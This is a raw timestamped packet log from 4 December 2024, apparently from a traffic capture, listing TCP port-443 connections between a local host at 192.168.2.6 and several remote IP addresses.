                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.603960991 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.604011059 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.604027033 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.604051113 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.604078054 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.722975016 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.722997904 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.723052025 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.723068953 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.723095894 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.723113060 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.745568991 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.745603085 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.745609999 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.745624065 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.745630980 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.745639086 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.745673895 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.745691061 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.745721102 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.745743990 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.751115084 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.751141071 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.751148939 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.751163006 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.751169920 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.751173019 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.751198053 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.751241922 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.751256943 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.751300097 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.756668091 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.756689072 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.756742001 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.756756067 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.756782055 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.756800890 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.782902956 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.782932043 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.782993078 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.783010006 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.783035040 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.783051014 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.800319910 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.800345898 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.800401926 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.800415993 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.800455093 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.839128971 CET4435008023.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.839935064 CET50080443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.839967966 CET4435008023.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.840586901 CET4435008023.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.842142105 CET50080443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.842240095 CET4435008023.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.895852089 CET50080443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.909271955 CET4435008123.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.909610033 CET50081443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.909635067 CET4435008123.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.910693884 CET4435008123.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.910773993 CET50081443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.911046982 CET50081443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.911401033 CET4435008123.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.922143936 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.922194958 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.922219992 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.922234058 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.922288895 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.922544956 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.922589064 CET443500764.152.199.46192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.922652960 CET50076443192.168.2.64.152.199.46
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.937700033 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.937712908 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.937745094 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.937762022 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.937772989 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.937830925 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.943993092 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.944014072 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.944071054 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.944087029 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.944120884 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.954288960 CET50081443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.954329014 CET4435008123.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.971816063 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.971841097 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.971903086 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.971929073 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.971954107 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:25.971971035 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.000020981 CET50081443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.002243996 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.002279043 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.002319098 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.002335072 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.002362013 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.002379894 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.116641998 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.116672993 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.116744041 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.116765022 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.116794109 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.116816044 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.122859955 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.122890949 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.122957945 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.122973919 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.123020887 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.130300999 CET4435008323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.130538940 CET50083443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.130564928 CET4435008323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.135845900 CET4435008323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.136198997 CET50083443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.136215925 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.136277914 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.136291981 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.136317015 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.136353970 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.136812925 CET50074443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.136830091 CET4435007413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.139520884 CET4435008323.209.72.42192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.145709991 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.145734072 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.145795107 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.145819902 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.145845890 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.145864964 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.173635960 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.173662901 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.173700094 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.173723936 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.173749924 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.173788071 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.188165903 CET50083443192.168.2.623.209.72.42
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.192851067 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.192874908 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.192926884 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.192948103 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.192974091 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.192991972 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.313180923 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.313205004 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.313261032 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.313282967 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.313313961 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.313332081 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.320475101 CET44350082152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.320806026 CET50082443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.320825100 CET44350082152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.321826935 CET44350082152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.321887016 CET50082443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.323214054 CET50082443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.323306084 CET44350082152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.323467016 CET50082443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.323474884 CET44350082152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.327862978 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.327887058 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.327940941 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.327956915 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.328011990 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.343740940 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.343761921 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.343803883 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.343825102 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.343859911 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.343888998 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.354401112 CET44350073159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.354468107 CET50073443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.354490995 CET44350073159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.354509115 CET44350073159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.354536057 CET50073443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.354562044 CET50073443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.355470896 CET50073443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.355489016 CET44350073159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.358665943 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.358691931 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.358730078 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.358750105 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.358798981 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.358824015 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.373918056 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.373943090 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.373990059 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.374011040 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.374039888 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.374058962 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.375608921 CET50082443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.388200998 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.388220072 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.388262033 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.388281107 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.388319969 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.401418924 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.401438951 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.401493073 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.401515007 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.401539087 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.401557922 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.416846991 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.416867018 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.416994095 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.416994095 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.417016029 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.417809963 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.515552044 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.515571117 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.515633106 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.515659094 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.515805960 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.527158022 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.527172089 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.527249098 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.527271986 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.527349949 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.536696911 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.536724091 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.536766052 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.536786079 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.536818981 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.546092987 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.546133041 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.546180964 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.546200037 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.546242952 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.548377991 CET50075443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.548401117 CET4435007513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.630069971 CET50084443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.630119085 CET4435008413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.630270004 CET50084443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.666292906 CET50084443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.666321039 CET4435008413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.772694111 CET44350082152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.798538923 CET44350082152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.798554897 CET44350082152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.798583031 CET44350082152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.798597097 CET44350082152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.798624039 CET50082443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.798650026 CET44350082152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.798671961 CET50082443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.798677921 CET44350082152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.798719883 CET50082443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.799021959 CET50082443192.168.2.6152.195.19.97
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.799040079 CET44350082152.195.19.97192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.839559078 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.839607000 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.839678049 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.840071917 CET50085443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.840084076 CET44350085159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.932655096 CET50086443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.932703018 CET4435008613.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.932792902 CET50086443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.933343887 CET50087443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.933402061 CET4435008713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.933494091 CET50087443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.934174061 CET50088443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.934200048 CET4435008813.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:26.934386969 CET50088443192.168.2.613.107.246.40
